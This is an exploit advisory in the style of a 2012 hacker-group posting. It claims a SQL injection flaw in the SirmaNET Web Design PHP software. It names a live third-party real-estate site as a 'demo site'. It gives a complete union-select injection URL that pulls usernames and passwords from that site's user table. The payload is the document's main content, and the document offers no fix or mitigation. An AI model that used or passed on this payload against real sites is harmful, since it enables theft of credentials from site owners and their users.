# Exploit Title: SirmaNET Web Design SQL Injection Vulnerability
# Date: 09/01/2012 - 03.04
# Author: 3spi0n
# Software Website: www.sirmanet.com
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:
[~] Changer
[$] Demo Sites:
[~] www.yigitemlakfinans.com/index.php?sayfa=emlaklar.php&kid1=63" [SQL
Injection]
[#] Analyzing ...
[~]
www.yigitemlakfinans.com//index.php?sayfa=emlaklar.php&kid1=63%20union%20select%201,2,group_concat%28username%29,4,group_concat%28password%29,6,7,8%20from%20user--+-
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# SpyDevilz.iN - Turkish Hacker Platform
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>